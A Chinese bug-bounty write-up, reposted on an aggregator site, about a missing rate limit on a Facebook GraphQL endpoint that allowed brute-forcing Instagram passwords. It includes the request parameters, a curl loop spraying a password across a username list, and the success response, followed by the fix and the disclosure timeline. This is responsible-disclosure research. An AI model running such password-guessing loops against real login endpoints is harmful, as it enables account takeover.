挖洞经验 | 缺乏速率限制(Rate Limitation)导致的Instagram账户密码枚举

栏目: IT技术 · 发布时间: 4年前

内容简介:今天分享的这篇Writeup关于速率限制问题(请求次数限制,Rate Limitation),这也是面向公众网站的设计中常常会忽略掉的防护措施,利用速率限制漏洞可以实现对网站注册用户名、密码等账户信息的批量枚举。这里的速率限制漏洞存在于Facebook验证Instagram用户访问某个管理接口的GraphQL请求中,攻击者利用该漏洞可以暴力枚举Instagram注册用户的密码。漏洞最终获得了Facebook官方$3000奖励。在Facebook与Instagram的某项应用交互中,Instagram用户通过

今天分享的这篇Writeup关于速率限制问题(请求次数限制,Rate Limitation),这也是面向公众网站的设计中常常会忽略掉的防护措施,利用速率限制漏洞可以实现对网站注册用户名、密码等账户信息的批量枚举。这里的速率限制漏洞存在于Facebook验证Instagram用户访问某个管理接口的GraphQL请求中,攻击者利用该漏洞可以暴力枚举Instagram注册用户的密码。漏洞最终获得了Facebook官方$3000奖励。

漏洞概况

在Facebook与Instagram的某项应用交互中,Instagram用户通过内置GraphQL请求跳转到某个管理界面,在此期间,Facebook会对用户身份做校验。起初看来,该请求服务端与客户端用户的多个交互请求都是通过用户名username来做身份认证的,然而经测试发现,如果在请求中用不同的用户名和密码组合匹配,都能获取到Instagram后端对密码正确性的有效响应,且无任何速率限制措施,为此,我们可以利用该漏洞,对Instagram用户的密码实施枚举。

漏洞复现

附带以下参数,向接口 https://www.facebook.com/api/graphql 执行POST请求(无需Cookie):

__a=1
doc_id=REDACTED&
variables={"data":{"business_id":BUSINESS_ID,"page_id":PAGE_ID,"username":"USERNAME","password":"PASSWORD"}}

其中的BUSINESS_ID 和 PAGE_ID都是代表事务处理和页面调用的随机id数, USERNAME为目标Instagram账户的用户名,PASSWORD为我们要枚举测试的密码字段。接下来,用curl方式,选定一个密码(这里以23456为例)匹配用户名字典USER_LIST,对上述Facebook接口发起请求:

while read user; do curl -k -i -X POST <a href="https://www.facebook.com/api/graphql/">https://www.facebook.com/api/graphql/</a> -H 'Content-Type: application/x-www-form-urlencoded' -d "__a=1&doc_id=REDACTED&variables={\"data\":{\"business_id\":RANDOM,\"page_id\":RANDOM,\"username\":\"$user\",\"password\":\"123456\"}}";done < USER_LIST

如果最终的密码和用户名组合在上述接口的校验过程中成功,则Facebook后端会返回以下有效响应信息:

(
"cm_ig_authentication": {
"is_authenticated": true
} )

漏洞影响

由于在上述接口请求中无速率限制措施(客户端用户的请求次数限制),因此利用上述请求,恶意攻击者可以构建大规模Instagram用户字典,通过不同的密码匹配,实施对任意Instagram用户的密码猜解枚举。

漏洞修复

Facebook在上述接口请求中,对“username” 和 “password”字段加入了速率限制措施。

漏洞上报和处理进程

 2020.2.4 — 漏洞初报 
 2020.2.11 —   Facebook确认漏洞 
 2020.3.9 — Facebook修复漏洞 
 2020.3.10 —   Facebook奖励$3000 

*参考来源: ysamm ,clouds 编译整理,转载请注明来自 FreeBuf.COM


以上所述就是小编给大家介绍的《挖洞经验 | 缺乏速率限制(Rate Limitation)导致的Instagram账户密码枚举》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

计算机视觉

计算机视觉

Richard Szeliski / 艾海舟、兴军亮 / 清华大学出版社 / 2012-1 / 109.00元

《计算机视觉——算法与应用》探索了用于分析和解释图像的各种常用技术,描述了具有一定挑战性的视觉应用方面的成功实例,兼顾专业的医学成像和图像编辑与交织之类有趣的大众应用,以便学生能够将其应用于自己的照片和视频,从中获得成就感和乐趣。本书从科学的角度介绍基本的视觉问题,将成像过程的物理模型公式化,然后在此基础上生成对场景的逼真描述。作者还运用统计模型来分析和运用严格的工程方法来解决这些问题。 本......一起来看看 《计算机视觉》 这本书的介绍吧!

JS 压缩/解压工具
JS 压缩/解压工具

在线压缩/解压 JS 代码

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具